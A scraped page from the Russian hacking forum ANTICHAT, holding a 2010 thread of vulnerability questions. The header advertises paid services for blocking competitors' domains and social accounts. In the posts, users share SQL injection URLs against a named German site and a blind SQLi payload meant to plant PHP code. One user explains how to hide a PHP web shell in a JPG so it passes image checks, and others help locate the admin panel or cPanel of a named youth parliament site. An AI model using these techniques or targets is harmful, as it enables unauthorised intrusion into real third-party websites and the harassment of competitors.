УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1401 из 2438

1401

Опции темы

Поиск в этой теме

Опции просмотра

#14001

23.06.2010, 15:19

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

Провел на форуме:
950638

Репутация: 256

Отправить сообщение для DrAssault с помощью ICQ

Цитата:

Сообщение от Konqi

Konqi said:
http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
а вот так не прокатило
http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+

Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то?

#14002

23.06.2010, 15:22

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от DrAssault

DrAssault said:
Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то?

ды сам не знаю,просто так написал..

а вот крутит старым добрым блайнд-ом не охота ((

#14003

23.06.2010, 16:06

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

[QUOTE="Bramin"]
Bramin said:
http://www.elixirherbals.com

#14004

23.06.2010, 17:02

k2b1~

Новичок

Регистрация: 17.06.2010

Сообщений: 0

Провел на форуме:
5094

Репутация: 0

есть админка..заливаю .php шелл не заливается..

долjна бить .jpg или .gif//

пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..

а как обходит ето ?

и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//

#14005

23.06.2010, 18:44

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Цитата:

Сообщение от k2b1~

k2b1~ said:
есть админка..заливаю .php шелл не заливается..
долjна бить .jpg или .gif//
пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..
а как обходит ето ?
и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//

Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.

#14006

23.06.2010, 19:09

se55555

Guest

Сообщений: n/a

Провел на форуме:
584

Репутация: 0

Все, сдаюсь, мне не осилить ваши шаманства

#14007

23.06.2010, 19:52

k2b1~

Новичок

Регистрация: 17.06.2010

Сообщений: 0

Провел на форуме:
5094

Репутация: 0

Цитата:

Сообщение от m0Hze

m0Hze said:
Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.

pomoq spasib..

#14008

23.06.2010, 19:53

k2b1~

Новичок

Регистрация: 17.06.2010

Сообщений: 0

Провел на форуме:
5094

Репутация: 0

youthparliament.am

админку не моqу наыти..

если кто смоjэт помоqите поялуста..

/admin пробовал.

#14009

23.06.2010, 19:57

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

Провел на форуме:
58603

Репутация: 3

blind sql

Всем привет!

Кручу blind вида(в поле ввода мыла):

Код:

Code:
la@la.la' and (select if((select user from mysql.user limit 1)='root',1,0))='1

У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу.

Ну т.е. я хочу в таблицу с новостями добавить php-код.

Прокатит ли такое?

#14010

23.06.2010, 20:01

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

Цитата:

Сообщение от k2b1~

k2b1~ said:
youthparliament.am
админку не моqу наыти..
если кто смоjэт помоqите поялуста..
/admin пробовал.

ну как на /admin нет прав, вот попробуй cPanel http://www.youthparliament.am/cpanel/

Страница 1401 из 2438

1401

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход